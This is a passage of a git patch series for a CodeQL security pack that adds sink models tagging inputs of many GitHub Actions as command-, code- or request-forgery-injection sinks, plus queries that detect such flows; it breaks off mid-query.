+extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 00000000000..f32484a4f0d --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml new file mode 100644 index 00000000000..9ce43e68a75 --- /dev/null +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml new file mode 100644 index 00000000000..ac3aaa67def --- /dev/null +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml new file mode 100644 index 00000000000..90fd673c705 --- /dev/null +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f58706..2c9f46b46f4 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 00000000000..1bcf8e7ce7a --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 00000000000..81706744568 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 00000000000..aeca6db0d98 --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..b9358bd2d69 --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 00000000000..a18319954e3 --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c..f46c40a8f9c 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 00000000000..219de80c39e --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 00000000000..dc3c2739e87 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml new file mode 100644 index 00000000000..30679750f13 --- /dev/null +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] + - ["nick-fields/retry", "*", "input.command", "command-injection"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml new file mode 100644 index 00000000000..c600e7a93b6 --- /dev/null +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml new file mode 100644 index 00000000000..ed9088c9f56 --- /dev/null +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml new file mode 100644 index 00000000000..988c3d5e674 --- /dev/null +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml new file mode 100644 index 00000000000..91a3382348c --- /dev/null +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 00000000000..d9d15dc94b2 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 00000000000..6bc0467692d --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 00000000000..62dea47d818 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 00000000000..525d0199859 --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 00000000000..5aac0f89432 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 00000000000..d32c6509ad7 --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 00000000000..c4ea326ecef --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -0,0 +1,24 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml new file mode 100644 index 00000000000..7213a39f992 --- /dev/null +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 00000000000..3207c6d7521 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 00000000000..d00d78bcba8 --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 00000000000..e2813105bdc --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad7..d6ba27a5079 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c43440..413f4f3058b 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 00000000000..42361b203e0 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 00000000000..474b36186b0 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 00000000000..73b93dbb88a --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 00000000000..4138b97f0fb --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 00000000000..1bcbac476a8 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef5..7c681d8a64b 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 00000000000..3072c6f54fd --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml new file mode 100644 index 00000000000..5fe53ea3d07 --- /dev/null +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml new file mode 100644 index 00000000000..5e87f6c3b94 --- /dev/null +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml new file mode 100644 index 00000000000..dbe5d2d542d --- /dev/null +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml new file mode 100644 index 00000000000..9ecbdb6329f --- /dev/null +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml new file mode 100644 index 00000000000..10920eb6bf5 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 00000000000..a1d49af0845 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 1e7414e5ce6..9e94968e280 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -21,7 +21,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From d21d453d1ccf9039b98df6adf0d6948dddf23743 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 0118/1267] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 00000000000..2a2225e17b6 --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -0,0 +1,38 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql new file mode 100644 index 00000000000..3834b0ac0d0 --- /dev/null +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -0,0 +1,44 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the 